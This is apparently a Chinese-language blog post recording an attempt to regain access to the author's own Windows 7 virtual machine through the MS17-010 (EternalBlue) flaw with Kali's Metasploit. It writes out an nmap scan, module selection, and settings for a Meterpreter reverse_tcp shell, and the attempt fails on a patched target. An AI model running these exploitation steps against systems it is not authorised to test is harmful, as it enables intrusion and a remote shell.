win7忘记密码_通过MS17-010打进去_创建管理员账户

今天用虚拟机的时候发现忘记密码了,服了,打一下,顺便记录一下sb经过。

最后是通过其本身镜像解决,或者用u盘做一个PE

✅第一步:工具准备

  • kali ( msfconsole美少妇

第二步:漏洞扫描

复制代码
nmap -p 445,3389 192.168.200.0/24 -O

本来想用08_067,改用永恒之蓝

第三步: MS17-010

🔎 打开Metasploit控制台

复制代码
msfconsole

🔎查找漏洞模块

复制代码
search eternalblue

👉 推荐选择

  • 第一次打:选择 0

    use exploit/windows/smb/ms17_010_eternalblue //use 0

这是最经典、最直接的永恒之蓝利用方式,最常用。

👉 0 模块打不进去:

  • 选择 1

    use exploit/windows/smb/ms17_010_psexec //use 1

它结合了 SMB 执行与永恒之蓝漏洞,有时能绕过部分系统限制。

👉 只检测:

  • 选择 3

    use auxiliary/scanner/smb/smb_ms17_010 //use 3

检测目标是否存在漏洞

👉 如果目标已经被种下 DoublePulsar 后门:

  • 选择 4

    use exploit/windows/smb/smb_doublepulsar_rce //use 4

利用植入的后门远程执行代码。

最佳顺序推荐(保险打法):

  1. 先用 auxiliary/scanner/smb/smb_ms17_010 扫描确认

  2. exploit/windows/smb/ms17_010_eternalblue

  3. 如果不成功,改用 exploit/windows/smb/ms17_010_psexec

像不正常情况下像我就是知道win7并且开启了445我就直接打了先说

🔎找到后使用

复制代码
use exploit/windows/smb/ms17_010_eternalblue  //use 0

🔎在 Metasploit 中,如果你想查看当前模块有哪些可设置的参数(选项),需要用命令:

设置攻击参数

cs 复制代码
set RHOSTS 192.168.200.128
set LHOST 你的攻击机IP
set LPORT 4444   # 端口随意,一般用 4444
set payload windows/x64/meterpreter/reverse_tcp

⚠ 如果目标系统是 32 位,可以改用:

cs 复制代码
set payload windows/meterpreter/reverse_tcp

查看配置是否正确:

cs 复制代码
show options

发起攻击

cs 复制代码
exploit

打不进去

选系统

还是打不进去

🔎为什么Win7(2009_2025)、开启445,结果却显示"不存在漏洞"?

🔎如何验证 SMBv1 是否真的开启?

可以用 smbclient 工具列出 Windows 共享**:**

cs 复制代码
smbclient -L //192.168.200.128 -N

如果 StateDisabled,那就无法利用永恒之蓝。

如果确认 SMBv1 被禁用,可以尝试:

攻击 SMBv2 协议相关漏洞,如:

  • SMB Signing 绕过

  • MS17-010 失败后可以尝试 ms17_010_psexec (编号1的模块)

cs 复制代码
use exploit/windows/smb/ms17_010_psexec

报错

cs 复制代码
[-] 192.168.200.128:445 - Unable to find accessible named pipe!

|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 放弃,永恒之蓝(EternalBlue)利用的是 SMBv1 协议的漏洞(MS17-010),如果目标没有开启 SMB 服务(即使开放了 445 端口),那么永恒之蓝也无法成功利用。 #### 关键点: * 445端口开放:端口 445 本身只是 SMB 服务的端口,表示目标机器上可能开放了 SMB 服务,但并不意味着 SMB 服务一定处于可用状态。如果没有启用 SMB 服务,攻击就无法进行。 * SMB 服务:攻击需要依赖 SMB 服务中的"命名管道"来进行漏洞利用。如果目标关闭了 SMB 服务或没有开放可用的命名管道,那么漏洞无法被触发。 总结起来,如果目标没有开启 SMB 服务,即使 445 端口开放,永恒之蓝也无法攻击成功 |

这个win7是打补丁的。

相关推荐
白山云北诗11 小时前
企业网站网络安全防护方案
安全·web安全·网络安全·ddos防护·web应用防火墙·cc防护
电报号dapp11912 小时前
NFT系统开发:在数字荒漠中铸造文明
安全·去中心化·区块链·智能合约
乾元13 小时前
企业无线的 AI 频谱与功率自动优化——从人工勘测到“可学习的无线网络”(含真实室内工程案例)
服务器·网络·人工智能·网络协议·安全·信息与通信
2301_7807896613 小时前
服务器感染的病毒有哪些特点呢?
安全·web安全
BEOL贝尔科技13 小时前
实验室的温湿度监控设备实时监测温度守护样本安全?又是如何保障的呢?
安全
manok13 小时前
探索研究:军用领域软件工厂建设核心路径——可信仓库与SBOM驱动的安全高效研发模式
大数据·人工智能·安全·软件工厂
奥升新能源平台14 小时前
奥升充电平台安全稳定体系构建
运维·安全·开源·springcloud
国冶机电安装14 小时前
燃气管道工程全解析:系统构成、施工规范与安全应用指南
安全
厦门辰迈智慧科技有限公司14 小时前
城市地下管网全域监测与安全防控整体解决方案
数据库·安全·物联网解决方案·地下管网监测·城市地下管网监测
国科安芯14 小时前
商业卫星多轴步进驱动系统的抗辐照MCU集成方案
运维·网络·单片机·嵌入式硬件·安全·安全威胁分析·risc-v